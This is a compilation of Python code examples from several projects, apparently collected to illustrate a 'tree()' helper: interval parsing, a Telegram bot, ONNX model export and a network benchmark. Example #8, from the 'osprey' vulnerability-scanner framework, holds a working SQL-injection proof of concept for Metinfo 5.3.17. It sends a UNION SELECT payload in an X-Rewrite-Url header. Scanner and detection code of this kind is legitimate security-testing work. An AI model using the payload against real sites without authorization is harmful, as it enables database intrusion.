Code Example #1
File: read.py Project: azofeifa/IE_FIT
def readIntervals(FILE,
                  STRAND,
                  single=False,
                  merge=False,
                  interval=None,
                  pad=(0, 0)):
    FH = open(FILE)
    D = {"+": {}, "-": {}}
    lines = FH.readlines()
    FH.close()

    for i, line in enumerate(lines):
        lineArray = line.strip("\n").split("\t")
        assert len(lineArray) == 5, \
            "strand\tchrom\tstart\tstop\tname(ID)\n format please..."
        strand, chrom, start, stop, name = lineArray
        if strand not in D:
            D[strand] = {}
        if chrom not in D[strand]:
            D[strand][chrom] = list()
        D[strand][chrom].append((int(start), int(stop), name))

    #sort
    for strand in D:
        for chrom in D[strand]:
            N = len(D[strand][chrom])
            size = N / 50.
            D[strand][chrom].sort()
            if interval is not None:
                start, stop = size * interval, size * (interval + 1)
                D[strand][chrom] = [
                    d for i, d in enumerate(D[strand][chrom])
                    if start <= i <= stop
                ]
            if single:
                D[strand][chrom] = isolate_overlaps.run(D[strand][chrom])
            elif merge:
                D[strand][chrom] = isolate_overlaps.merge(D[strand][chrom])
            if STRAND == "-":
                D[strand][chrom] = [(start - pad[1], stop + pad[0], name)
                                    for start, stop, name in D[strand][chrom]]
            else:
                D[strand][chrom] = [(start - pad[0], stop + pad[1], name)
                                    for start, stop, name in D[strand][chrom]]
            D[strand][chrom] = utils.tree(D[strand][chrom])

    # D is seeded with "+" and "-" keys, so this only fires for other values
    if STRAND not in D:
        print("user specified strand is not present in annotation file")
        D = None
    return D
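Here `utils.tree` receives the padded, sorted interval list, so in this project it presumably builds a searchable interval structure. A minimal sketch of one plausible implementation (an assumption; IE_FIT's real helper is not shown): a binary search tree over sorted, non-overlapping intervals supporting point lookup.

# Hypothetical sketch of what utils.tree(...) might build here.
# `intervals` must be a non-empty, sorted list of (start, stop, name).
class IntervalNode(object):
    def __init__(self, intervals):
        mid = len(intervals) // 2
        self.start, self.stop, self.name = intervals[mid]
        self.left = IntervalNode(intervals[:mid]) if mid > 0 else None
        self.right = IntervalNode(intervals[mid + 1:]) if mid + 1 < len(intervals) else None

    def search(self, pos):
        # return the name of the interval containing pos, or None
        if self.start <= pos <= self.stop:
            return self.name
        if pos < self.start and self.left is not None:
            return self.left.search(pos)
        if pos > self.stop and self.right is not None:
            return self.right.search(pos)
        return None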
Code Example #2
File: RunPoc.py Project: zodiacyann/osprey
    def start(self):
        task = self.task_queue.get(block=False)
        # [target, (vid1, [name1, class1])]
        target = task[0]
        poc_vid = task[1][0]
        poc_name = task[1][1][0].split(".")[-1]
        poc = task[1][1][1]()

        poc.scan_info = {
            'TaskId': self.task_id,
            'Target': target,
            'Verbose': self.verbose,
            'Error': '',
            'Mode': self.mode,
            'Success': False,
            'Ret': tree(),
            "risk_category": poc.scan_info.get('risk_category', '')
        }
        poc.poc_info["poc"]["Class"] = task[1][1][1].__name__

        timeout = Timeout(self.fb.poc_setting.timeout)
        timeout.start()
        try:
            log.info("{} - {} start...".format(poc_vid, target))
            poc.run(fb=self.fb)
            log.info("{} - {} finish.".format(poc_vid, target))
        except Timeout:
            poc.scan_info['Error'] = "PoC run timeout."
            poc.scan_info['Success'] = False
            log.error("{} - {} error: PoC run timeout.".format(
                poc_vid, target))
        except (requests.exceptions.Timeout,
                requests.exceptions.ConnectionError) as e:
            poc.scan_info['Error'] = str(e)
            poc.scan_info['Success'] = False
            log.error("{} - {} error: {}.".format(poc_vid, target, e))
        except Exception:
            import traceback
            err = traceback.format_exc()
            poc.scan_info['Error'] = err
            poc.scan_info['Success'] = False
            log.error("{} - {} error: {}.".format(poc_vid, target, err))
        finally:
            timeout.cancel()
        if not poc.scan_info.get("Success", False):
            return
        if self.fb.poc_setting.return_resp:
            poc.scan_info["req_resp"] = self._get_http_data(poc_vid, target)
        self.result.put_nowait([poc_name, poc.poc_info, poc.scan_info])
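The `Timeout` guard above is presumably gevent's; a minimal sketch of the same pattern in isolation (assuming gevent.Timeout):

import gevent
from gevent import Timeout

timeout = Timeout(5)   # raise Timeout in this greenlet after 5 seconds
timeout.start()
try:
    gevent.sleep(10)   # stands in for the long-running poc.run(...)
except Timeout:
    print("PoC run timeout.")
finally:
    timeout.cancel()   # always cancel so the timer cannot fire later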
Code Example #3
def analysis(project_data_dict):
    suggestion_return = []
    for project_name in project_data_dict.keys():
        payload = {
            "entityId": project_data_dict[project_name]["entityId"],
            "projectName": project_name,
            "dateTime":
            str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
        }
        df = pd.read_json(json.dumps(project_data_dict[project_name]["data"]))
        df.set_index('locIds', inplace=True)
        df["tp_average_np"] = df.apply(lambda x: np.array(
            [x.tp_average_7, x.tp_average_1, x.tp_average_2]),
                                       axis=1)
        print(df)
        suggestion_list = []
        room_tree = tree()  # create the autovivifying tree structure
        for i in list(df.index):
            # touching the keys autovivifies the nested building/floor/room levels
            room_tree[json.loads(i)[0]][json.loads(i)[1]][json.loads(i)[2]]
        room_tree = dicts(room_tree)  # convert the tree back to plain dicts
        for i in list(df.index):  # room level: each leaf becomes its ({locId}, [averages]) value
            room_tree[json.loads(i)[0]][json.loads(i)[1]][json.loads(
                i)[2]] = df.tp_average_np[i]
            suggestion_list.append(
                {json.loads(i)[2]:
                 judge_room(df.tp_average_np[i][1])})  # flag the room based on the previous day's average temperature
        sum_building = 0
        num = 0
        for k, i in zip(room_tree.keys(), room_tree.values()):  # building
            for j in i.keys():  # floor
                sum_building += np.sum(list(i[j].values()), axis=0)
                num += len(list(i[j].values()))
                i[j] = (i[j], np.average(list(i[j].values()), axis=0))
                suggestion_list.append(
                    {j: judge_floor(i[j][1][1], list(i.keys()))})
            room_tree[k] = (room_tree[k], sum_building / num)
            suggestion_list.append({
                k:
                judge_building(room_tree[k][1][1], list(room_tree.keys()))
            })
        payload["suggestion"] = suggestion_list
        suggestion_return.append(payload)
    return suggestion_return
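The `tree()` and `dicts()` helpers are not shown in this example. A common pairing, offered here as an assumption, is the autovivifying defaultdict recipe plus a recursive converter back to plain dicts:

from collections import defaultdict

def tree():
    # autovivifying nested dict: missing keys create further trees on access
    return defaultdict(tree)

def dicts(t):
    # recursively convert a tree back into plain dicts
    return {k: dicts(v) if isinstance(v, dict) else v for k, v in t.items()}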
Code Example #4
File: bot.py Project: usernein/auxiliostatus
async def alert_init(client):
    plugins = [(handler.user_callback
                if hasattr(handler, 'user_callback') else handler.callback)
               for group in client.dispatcher.groups.values()
               for handler in group]

    plugins_count = len(plugins)
    plugins_names = []
    for plugin_callback in plugins:
        members = {
            key: value
            for key, value in inspect.getmembers(plugin_callback)
        }
        full_name = f"{members['__globals__']['__name__']}.{members['__name__']}"
        plugins_names.append(full_name)
    plugins_text = utils.tree(utils.parse_tree(plugins_names))
    started_text = config.langs.start_log(plugins_count=plugins_count,
                                          plugins_names=plugins_names,
                                          plugins_text=plugins_text,
                                          client=client)

    await client.send_message(logs_chat, started_text)
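`utils.parse_tree` and `utils.tree` are not shown; a plausible (hypothetical) pairing nests the dotted plugin names into a dict and renders it as an ASCII tree:

def parse_tree(names):
    # hypothetical: nest dotted names such as "plugins.start" into a dict
    root = {}
    for name in names:
        node = root
        for part in name.split('.'):
            node = node.setdefault(part, {})
    return root

def _render(node, prefix=''):
    entries = sorted(node)
    for i, name in enumerate(entries):
        last = i == len(entries) - 1
        yield prefix + ('└── ' if last else '├── ') + name
        for line in _render(node[name], prefix + ('    ' if last else '│   ')):
            yield line

def tree(node):
    # hypothetical: render the nested dict as one printable block of text
    return '\n'.join(_render(node))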
Code Example #5
def main():
    image_path, weights_dir = download_demo()

    # Example of weights directory structure
    """
     dir: ./data/unet-lemon-kiwi
     ├── model.pt
     └── config.json
    """
    print(f"Weights dir: {weights_dir}")
    for line in tree(Path(weights_dir)):
        print(line)

    # use one of:
    #device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    #device = torch.device('cuda:0')
    device = torch.device('cpu')

    # load model input resolution and the list of output classes
    model_config_path = os.path.join(weights_dir, "config.json")
    with open(model_config_path) as f:
        model_config = json.load(f)
    num_output_classes = len(model_config["class_title_to_idx"])

    # construct model graph
    model = construct_unet(n_cls=num_output_classes)

    weights_path = os.path.join(weights_dir, "model.pt")
    #load model as DataParallel, can be used only on GPU
    #model = DataParallel(model).cuda()
    #model.load_state_dict(torch.load(weights_path, map_location=device))

    # convert weights from DataParallel to generic format
    generic_weights_path = os.path.join(weights_dir, "generic_model.pt")
    if not sly.fs.file_exists(generic_weights_path):
        convert_weights_to_generic_format(model, weights_path,
                                          generic_weights_path)
    # model can be used both on CPU or GPU
    model = construct_unet(n_cls=num_output_classes)
    model.load_state_dict(torch.load(generic_weights_path,
                                     map_location=device))

    # move model to device and set to inference mode
    model.to(device)
    model.eval()

    # inference on image
    image = cv2.imread(image_path, cv2.IMREAD_COLOR)
    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
    results, output_model_raw = predict(device, model, model_config, image)
    for class_name, class_mask in results.items():
        cv2.imwrite(os.path.join(data_dir, f"{class_name}.png"), class_mask)

    # convert to ONNX format
    device = torch.device('cpu')
    model.to(device)
    model.eval()
    onnx_weights_path = os.path.join(weights_dir, "model.onnx")
    #sly.fs.silent_remove(onnx_weights_path) # ONLY FOR DEBUG
    if not sly.fs.file_exists(onnx_weights_path):
        inp = to_model_input(model_config, image)
        torch.onnx.export(
            model,
            inp,
            onnx_weights_path,
            opset_version=11,
            export_params=True,
            do_constant_folding=True,
            input_names=['input'],
            output_names=['output'],
            dynamic_axes={
                'input': {
                    0: 'batch_size'
                },  # variable length axes
                'output': {
                    0: 'batch_size'
                }
            })

        # verify onnx model
        import onnx
        onnx_model = onnx.load(onnx_weights_path)
        onnx.checker.check_model(onnx_model)

        # test onnx model
        import onnxruntime
        ort_session = onnxruntime.InferenceSession(onnx_weights_path)

        def to_numpy(tensor):
            return tensor.detach().cpu().numpy(
            ) if tensor.requires_grad else tensor.cpu().numpy()

        # compute ONNX Runtime output prediction
        x = to_model_input(model_config, image)
        ort_inputs = {ort_session.get_inputs()[0].name: to_numpy(x)}
        ort_outs = ort_session.run(None, ort_inputs)

        # compare ONNX Runtime and PyTorch results
        np.testing.assert_allclose(to_numpy(output_model_raw),
                                   ort_outs[0],
                                   rtol=1e-03,
                                   atol=1e-05)
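The `tree(Path(...))` call above yields printable lines for a directory; it is likely a variant of the well-known pathlib recipe (an assumption, since the project's helper is not shown). Code Example #6 below uses the same helper.

from pathlib import Path

def tree(dir_path, prefix=''):
    # yield the directory listing line by line with box-drawing connectors
    contents = sorted(dir_path.iterdir())
    pointers = ['├── '] * (len(contents) - 1) + ['└── ']
    for pointer, path in zip(pointers, contents):
        yield prefix + pointer + path.name
        if path.is_dir():
            extension = '│   ' if pointer == '├── ' else '    '
            yield from tree(path, prefix=prefix + extension)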
Code Example #6
def _handle_list_files(params):
    root = Path.home().joinpath('Desktop')
    if len(params) > 0 and Path(params[0]).is_dir():
        root = Path(params[0])
    res = f'List of files rooted at {root} :-\n'
    return res + '\n'.join(utils.tree(root))
Code Example #7
File: BasePoc.py Project: zodiacyann/osprey
class BasePoc:
    poc_info = {
        'poc': {
            'Id': None,  # PoC id; naming convention: vb_2014_0001_*.py
            'vbid': None,  # vulbox id
            'Name': None,  # PoC name
            'Author': None,  # PoC author
            'Create_date': None,  # PoC creation date, e.g. '2014-11-19'
        },

        # to be edited by you
        'vul': {
            'Product': None,  # name of the affected product
            'Version': None,  # product version
            'Type': None,  # vulnerability type
            'Severity': None,  # Bug severity
            'Description': None,  # vulnerability description
            'DisclosureDate': None,  # disclosure date, e.g. '2014-11-19'
        }
    }

    # Initialized before a scan starts (target, mode, verbose) and used to
    # save the results after the scan finishes (Error, Success, Ret).
    # Extra output is stored in Ret as a dict.
    # to be updated by verify or exploits
    scan_info = {
        'Target': '',  # target site domain
        'TaskId': '',
        'Mode': 'verify',  # 'verify' or 'exploit'; defaults to 'verify'
        'Verbose': False,  # whether to print verbose output; defaults to False
        'Error': '',  # records PoC failure information
        'Success': False,  # whether the PoC succeeded; defaults to False, update to True on success
        'Ret': utils.tree()  # records extra PoC-related information
    }
    # storage for the data needed by test scripts
    test_case = {
        'Need_fb': False,  # whether upstream data is needed or test data is hard to build; False skips testing
        'Vuln': [],  # test targets that this PoC should verify as vulnerable
        'Not_vuln': []  # test targets that this PoC should not verify as vulnerable
    }

    def __init__(self):
        pass

    def verify(self, first=False, *args, **kwargs):
        pass

    def exploit(self, first=False, *args, **kwargs):
        pass

    def run(self, first=False, fb=None, **kwargs):
        self.target = self.scan_info['Target']
        self.mode = self.scan_info['Mode']
        self.verbose = self.scan_info['Verbose']
        self.fb = fb

        if self.mode == 'verify':
            self.verify(first=first, **kwargs)
        elif self.mode == 'exploit':
            self.exploit(first=first, **kwargs)

    # call it to test POC
    def run_test(self):
        pass
Code Example #8
class MetinfoXRewriteurlSQLInjection(BasePoc):

    # PoC implementation class; must inherit from BasePoc.
    # Fill in the basic info in the poc_info, scan_info and test_case dicts.

    poc_info = {
        'poc': {
            'Id': 'vb_2017_0060',    # PoC VID number
            'vbid': '',
            'Name': 'Metinfo 5.3.17 X-Rewrite-url SQL Injection',    # PoC name
            'Author': 'ice.liao',    # PoC author
            'Create_date': '2017-08-15',    # PoC creation date
        },

        'vul': {
            'Product': 'Metinfo',    # name of the affected product
            'Version': '5.3.17',    # product version
            'Type': 'SQL Injection',    # vulnerability type
            'Severity': 'critical',    # severity: low/medium/high/critical
            'isWeb': True,    # whether this is a web vulnerability
            'Description': '''
                MetInfo is a content management system (CMS) developed in PHP
                and MySQL by Changsha Mituo Information Technology Co., Ltd. (China).
                Impact: site database contents can be leaked, and the admin
                password can be obtained by a remote attacker.
                Fix: download the latest version from http://www.metinfo.cn/download/
            ''',    # brief vulnerability description
            'DisclosureDate': '2017-08-11',    # PoC disclosure date
        }
    }

    # scan_info can keep its defaults; parameters such as target/mode/verbose
    # can all be set via command-line arguments in the TCC framework
    scan_info = {
        'Target': '',    # target site domain
        'Mode': 'verify',    # verify or exploit
        'Verbose': True,    # whether to print verbose output
        'Error': '',    # can record related information when detection fails
        'Success': False,    # whether the vulnerability was detected; update to True if found
        'risk_category': 'sec_vul',
        'Ret': tree()    # can be used to record extra information
    }

    test_case = {
        'Need_fb': False,
        'Vuln': [],    # test URLs in list form
        'Not_vuln': [],    # same as above
    }


    def verify(self, first=False):
        # vulnerability verification method (mode=verify)
        target = self.scan_info.get("Target", "")    # get the test target
        verbose = self.scan_info.get("Verbose", False)   # whether to print verbose output

        # the PoC's detection logic follows
        url = urljoin(target, 'index.php?lang=Cn&index=1')
        payload = "1/2/zxxza' union select 1,2,3,md5(0x11),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#/index.php"
        headers = {
            "X-Rewrite-Url": payload
        }

        location = ""
        # req sends the HTTP request and handles the response; it is the TCC
        # framework's unified wrapper around requests: req(url, method, **kwargs),
        # with the same argument passing as requests
        resp = req(url, 'get', headers=headers, allow_redirects=False)
        if resp is not None:
            location = resp.headers.get("Location", "")

        if "47ed733b8d10be225eceba344d533586" in location:
            self.scan_info['Success'] = True    # 漏洞存在,必须将该字段更新为True(必须)
            self.scan_info['Ret']['VerifyInfo']['URL'] = url    # 记录漏洞相关的一些额外信息(可选)
            self.scan_info['Ret']['VerifyInfo']['DATA'] = "X-Rewrite-Url:" + payload
            if verbose:
                highlight('[*] Metinfo 5.3.17 X-Rewrite-url SQL Injection found')    # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息


    def exploit(self, first=False):
        # exploitation method (mode=exploit)
        self.verify(first=first)
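`Ret` is an autovivifying tree, which is why `verify` can assign `self.scan_info['Ret']['VerifyInfo']['URL']` without creating the 'VerifyInfo' level first. A minimal demonstration, assuming the same defaultdict recipe sketched after Code Example #3:

from collections import defaultdict

def tree():
    return defaultdict(tree)  # same recipe as sketched earlier

ret = tree()
ret['VerifyInfo']['URL'] = 'http://example.com/index.php'  # 'VerifyInfo' is
# created on first access, so no KeyError and no explicit setdefault is needed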
Code Example #9
def pingpong(o):

    texec = []

    ping = 'ping'
    pong = 'pong'
    if sys.platform == 'win32':
        ping = 'ping.exe'
        pong = 'pong.exe'

    apiselect=0
    if o.capi:
        #C
        texec.append([])
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + ping)
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/c/' + pong)
        texec[apiselect].append('C')
        apiselect+=1

    if o.cppapi:
        #SACPP
        texec.append([])
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + ping)
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/cpp/' + pong)
        texec[apiselect].append('SACPP')
        apiselect+=1

    if o.isoapi:
        #ISOCPP
        texec.append([])
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + ping)
        texec[apiselect].append(os.environ['OSPL_HOME'] + '/examples/dcps/RoundTrip/isocpp/' + pong)
        texec[apiselect].append('ISOCPP')
        apiselect+=1


    # Create or append to total averages file
    tafcsv = utils.getCSV(o.averagesfile)

    #Create nested dictionary
    results = utils.tree()

    for i in texec:
        resultsApi = results[i[2]]
        #1KB
        Bsize = 1000

        try:
            if o.pongonly:
                pong = subprocess.Popen([i[1]],stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                utils.setPriority(pong.pid, o.pongnice, o.pongaffinity)

            if o.pongonly and not o.pingonly:
                #Run for 10 minutes and exit program
                time.sleep(600)
                sys.exit(0)
            time.sleep(1)
            # Set the CSV output file (af)
            csvfile = i[0] + ".csv"
            cw = utils.getCSV(csvfile)

            cw.writerow([str(time.strftime("%x %H:%M:%S"))])
            try:
                while Bsize <= (o.maxpayload * 1000):
                    resultsBsize = resultsApi[int(Bsize)]
                    print("launching " + i[0] + " with args: " + str(Bsize) + " " + str(o.samples) + " " + str(o.seconds))
                    cw.writerow([str(Bsize/1000)+"KB"])
                    cw.writerow(['Seconds'] + ['RT Count'] + ['RT median'] + ['RT min'] +
                                ['W Count'] + ['W median'] + ['W min'] +
                                ['R Count'] + ['R median'] + ['R min'])
                    try:
                        if o.pingonly:
                            ping = subprocess.Popen( [i[0], str(Bsize), str(o.samples), str(o.seconds) ],
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
                            utils.setPriority(ping.pid, o.pingnice, o.pingaffinity)
                    except OSError:
                        print "Cannot find ping executable: " + str([i[0]])

                    #Wait for ping to terminate
                    ping.wait()
                    for line in ping.stderr:
                        print('err: ' + line)

                    for line in ping.stdout:
                        utils.parseRT(line,resultsBsize)

                    for key in sorted(resultsBsize):
                        k = resultsBsize[key]
                        cw.writerow([key] +
                        [k['RoundTrip']['Count']] + [k['RoundTrip']['Median']] + [k['RoundTrip']['Min']] +
                        [k['Read']['Count']] + [k['Read']['Median']] + [k['Read']['Min']] +
                        [k['Write']['Count']] + [k['Write']['Median']] + [k['Write']['Min']])

                    Bsize = Bsize*2
            except OSError:
                print "Cannot find ping executable: " + [i[0]]

            finally:
                if o.pongonly:
                    #Quit pong
                    pingq = subprocess.Popen( [i[0], 'quit' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                    pingq.wait()
                    for line in zip(pingq.stdout, pingq.stderr):
                        print(line)
                    pong.terminate()

        except OSError:
            print "Cannot find pong executable: " + str([i[1]])



    tafcsv.writerow([str(time.strftime("%x %H:%M:%S"))])
    tafcsv.writerow(['Payload KB'] + ['RoundTrip C'] + ['RoundTrip SACPP'] + ['RoundTrip ISOCPP']
                    + ['Read C'] + ['Read SACPP'] + ['Read ISOCPP']
                    + ['Write C'] + ['Write SACPP'] + ['Write ISOCPP'])
    Bsize = 1000
    while Bsize <= (o.maxpayload * 1000):
        KB = Bsize/1000
        #pdb.set_trace()
        tafcsv.writerow([KB] + utils.is_empty(results['C'][Bsize]['Overall']['RoundTrip']['Median'])
                            + utils.is_empty(results['SACPP'][Bsize]['Overall']['RoundTrip']['Median'])
                            + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['RoundTrip']['Median'])
                            + utils.is_empty(results['C'][Bsize]['Overall']['Read']['Median'])
                            + utils.is_empty(results['SACPP'][Bsize]['Overall']['Read']['Median'])
                            + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Read']['Median'])
                            + utils.is_empty(results['C'][Bsize]['Overall']['Write']['Median'])
                            + utils.is_empty(results['SACPP'][Bsize]['Overall']['Write']['Median'])
                            + utils.is_empty(results['ISOCPP'][Bsize]['Overall']['Write']['Median']))

        Bsize = Bsize*2
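`utils.is_empty` is not shown. Because `results` is an autovivifying tree, looking up a combination that was never measured returns an empty nested node rather than a number, so `is_empty` plausibly normalizes either case into a one-element list for the row concatenation above (an assumption):

def is_empty(value):
    # hypothetical helper: an autovivified lookup on a missing key yields an
    # empty dict-like node; normalize it so rows can be built with list `+`
    if isinstance(value, dict) and not value:
        return ['']
    return [value]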